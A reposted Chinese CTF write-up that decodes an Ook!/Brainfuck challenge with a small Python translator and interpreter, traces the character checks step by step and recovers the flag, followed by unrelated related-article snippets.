ook是变形的brainfuck,只有.!?三种符号,每两个一组组成8种符号,表示前进后退加减IO和循环。

在输入一个字符后会作个减法如果结果为0就是正确,但不0也不会报错,这语言太差。然后一步步debug就行了

msg = open('miverse.txt').read().replace('\n','').replace('\r','')

dic = {'.?':'>', '?.':'<', '..':'+', '!!':'-', '!.':'.', '.!':',', '!?':'[', '?!':']'}
cmd = ''.join([ dic[msg[i:i+2]] for i in range(0, len(msg), 2) ])
print(cmd)

op = [0]*1000
rip = 0
p = 0
while p<len(cmd):
    i = cmd[p]
    p += 1
    if i == '>':
        rip+=1 
    elif i == '<':
        rip-=1
    elif i == '+':
        op[rip]+=1
    elif i == '-':
        op[rip]-=1 
    elif i == '.':
        print('==>',chr(op[rip]))
    elif i == ',':
        op[rip] = ord(input('---->')[0])
    elif i == '[':
        if op[rip] == 0:
            cnt = 1
            while cnt != 0:
                if cmd[p] == '[': cnt += 1
                if cmd[p] == ']': cnt -= 1
                p += 1
    elif i == ']':
        cnt = 1
        p -= 1
        while cnt!=0:
            p -= 1 
            if cmd[p] == ']' : cnt += 1
            if cmd[p] == '[' : cnt -= 1
    if p>440:
        print(p,rip,op[:25])    


#输入字符后运算应等于0
#b'Just_ReLerse_OoK!'

'''
---->o
1116 3 [0, 0, 0, 111, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
...
1145 3 [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
---->k
1146 3 [0, 0, 0, 107, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
...
1173 3 [0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
---->!
1174 3 [0, 0, 0, 33, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
...
1195 3 [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
'''

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1119102.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Node学习笔记之Node简介

一、Node简介 1.1、为什么学习Node(了解) 企业需求 增加自身职业竞争力 进一步理解 Web&#xff0c;并有助于明白后端开发 大前端必备技能 为了更好的学习前端框架 ... ... 1.2、Node是什么 Node.js是基于 Chrome的V8 JavaScript 引擎构建的JavaScript运行环境。 Node.js不是新…

C++特性——inline内联函数

1. 内联函数 1.1 C语言的宏 在C语言中&#xff0c;我们学习了用#define定义的宏函数&#xff0c;例如&#xff1a; #define Add(x, y) ((x) (y)) //两数相加相较于函数&#xff0c;我们知道宏替换具有如下比较明显的优点&#xff1a; 性能优势&#xff1a; 宏在预处理阶段…

数据结构-树的概念结构及存储

&#x1f5e1;CSDN主页&#xff1a;d1ff1cult.&#x1f5e1; &#x1f5e1;代码云仓库&#xff1a;d1ff1cult.&#x1f5e1; &#x1f5e1;文章栏目&#xff1a;数据结构专栏&#x1f5e1; 目录 一、树的基本概念及结构 1树的概念 2树的存储 二、二叉树的概念及结构 1二叉树的概…

FPGA的64点FFT代码及报告,verilog快速傅里叶变换

名称&#xff1a;64点FFT快速傅里叶变换Radix4 软件&#xff1a;Quartus 语言&#xff1a;Verilog 代码功能&#xff1a; 使用verilog实现64-point Pipeline FFT处理器 FPGA代码资源下载网&#xff1a;hdlcode.com 代码下载&#xff1a; 名称&#xff1a;64点FFT快速傅里…

保姆级 Keras 实现 Faster R-CNN 十四 (预测)

保姆级 Keras 实现 Faster R-CNN 十四 一. 预测模型二. TargetLayer三. 预测四. 显示预测结果五. 加载训练好的参数六. 效果展示七. 代码下载 上一篇 文章中我们完成了 Faster R-CNN 训练的功能, 现在到了预测部分了 一. 预测模型 因为在预测的时候并不需标签, 所以 RoiLabel…

[Linux打怪升级之路]-system V共享内存

前言 作者&#xff1a;小蜗牛向前冲 名言&#xff1a;我可以接受失败&#xff0c;但我不能接受放弃 如果觉的博主的文章还不错的话&#xff0c;还请点赞&#xff0c;收藏&#xff0c;关注&#x1f440;支持博主。如果发现有问题的地方欢迎❀大家在评论区指正 本期学习目标&…

基于Ubuntu Server编译YTM32 SDK工程

基于Ubuntu Server编译YTM32 SDK工程 文章目录 基于Ubuntu Server编译YTM32 SDK工程需求下载软件包安装与配置配置虚拟机联网模式启用ssh连接启用ftp连接安装armgcc编译工具链确认make工具 验证 需求 在Linux系统环境下搭建SDK的编译环境&#xff1a; 方便加入到持续集成工具…

16.The Tensor Product:Vector/Covector combinations

本节将概括目前为止所学的张量积知识。并讨论一般张量&#xff0c;它可以由任意数量的向量和协向量的任意组合来生成。 同样&#xff0c;也是使用的非标准的符号。 (2&#xff0c;0)阶张量&#xff0c; 由两个向量生成的。 &#xff08;1&#xff0c;2&#xff09;阶张…

C++学习之多态详解

目录 多态的实现 例题 重载 重写 重定义的区别 抽象类 多态实现原理 多态的实现 C中的多态是指&#xff0c;当类之间存在层次结构&#xff0c;并且类之间是通过继承关联时&#xff0c;就会用到多态。多态意味着调用成员函数时&#xff0c;会根据调用函数的对象的类型来执…

Spring IOC之@ComponentScan

博主介绍&#xff1a;✌全网粉丝4W&#xff0c;全栈开发工程师&#xff0c;从事多年软件开发&#xff0c;在大厂呆过。持有软件中级、六级等证书。可提供微服务项目搭建与毕业项目实战&#xff0c;博主也曾写过优秀论文&#xff0c;查重率极低&#xff0c;在这方面有丰富的经验…

[SWPUCTF 2023 秋季新生赛] web题解

文章目录 colorful_snakeNSS_HTTP_CHEKER一键连接!ez_talkPingpingpingUnS3rialize查查needRCE-PLUSbackup colorful_snake 打开题目&#xff0c;查看js源码 直接搜flag 把那三行代码复制到控制器&#xff0c;得到flag NSS_HTTP_CHEKER 都是http请求基本知识 抓包按照要求来&…

企业知识库管理系统怎么做?

21世纪&#xff0c;一个全新的信息化时代&#xff0c;从最初的传统办公到现在的信息化办公&#xff0c;一个世纪的跨越造就了各种大数据的诞生。 知识库系统 在这个数据横行的时代&#xff0c;文档管理产品市场逐渐兴盛起来&#xff0c;企业知识库管理系统作为企业的智慧信息的…

计算机组成原理new15 磁盘

文章目录 磁盘的结构磁盘的性能指标磁盘阵列固态硬盘SSD关于机械硬盘和固态硬盘的地址 这里计算传输时间和数据传输率是难点 磁盘的结构 注&#xff1a;磁盘的基本读取单位是扇区&#xff0c;但是每次只能读取1bit&#xff0c;这里我们应该理解为磁盘每次的读写操作至少要持续…

初始 c++(1)

目录: 目录 1: 命名空间的详解 2:c的输入与输出关键字及理解 3:详细讲解第一个c程序(每段代码的意思) 4:缺省参数的理解 5:函数重载 引言&#xff1a;从今天开始我们就开始学习c了&#xff0c;让我们一起开始新的知识吧&#xff01; 1&#xff1a;命名空间 所谓的命名空间…

深度学习学习笔记-模型的修改和CRUD

目录 1.打印模型,理解模型结构2.模型保存与加载3.模型的模块CRUD和模块的层的CRUD 1.打印模型,理解模型结构 import torchclass MyModel(torch.nn.Module):def __init__(self):super().__init__()self.layer1 torch.nn.Sequential(torch.nn.Linear(3, 4),torch.nn.Linear(4, …

云计算——网络虚拟化简介

作者简介&#xff1a;一名云计算网络运维人员、每天分享网络与运维的技术与干货。 座右铭&#xff1a;低头赶路&#xff0c;敬事如仪 个人主页&#xff1a;网络豆的主页​​​​​ 目录 前期回顾 前言 一.网络虚拟化 二.网络虚拟化介绍 三.为什么要网络虚拟化 四,网络…

STM32+2.9inch微雪墨水屏(电子纸)实现显示

本篇文章从硬件原理以及嵌入式编程等角度完整的介绍了墨水屏驱动过程&#xff0c;本例涉及的墨水屏为2.9inch e-Paper V2,它采用的是“微胶囊电泳显示”技术进行图像显示&#xff0c;其基本原理是悬浮在液体中的带电纳米粒子受到电场作用而产生迁移&#xff0c;从而改变显示屏各…

【C++初阶】小白入门C++

目录 前言&#xff1a;1、C关键字2、命名空间2.1命名空间是什么2.2为什么要有命名空间2.3命名空间怎么使用2.3.1命名空间的写法2.3.2命名空间是可以嵌套的2.3.3使用命名空间的三种方式 3、C输入和输出3.1初识cout和cin3.2C的输入输出可以自动识别变量类型 4、缺省参数4.1缺省参…

Linux:用户和权限

Linux&#xff1a;用户和权限 1. 认知root用户1.1 root用户&#xff08;超级管理员&#xff09;1.2 su和exit命令1.3 sudo命令1.3.1 为普通用户配置sudo认证 2. 用户、用户组管理2.1 用户组管理2.2 用户管理2.3 getent命令 3. 查看权限控制3.1 认知权限信息3.1.1 案例 4. 修改权…

react 实战- 玩转 react 全家桶(进阶)学习

一个命令是怎么运行起来的? Shell运行一个命令,实际上是运行一个脚本 环境变量 装了node以后,node的路径,就被注册到了环境变量里. 一个js的东西,可以注册? bin Webpack配置 构建 import A from A , const Arequire(A) 为什么可以这么写?为哈都行?本质上,是构建工…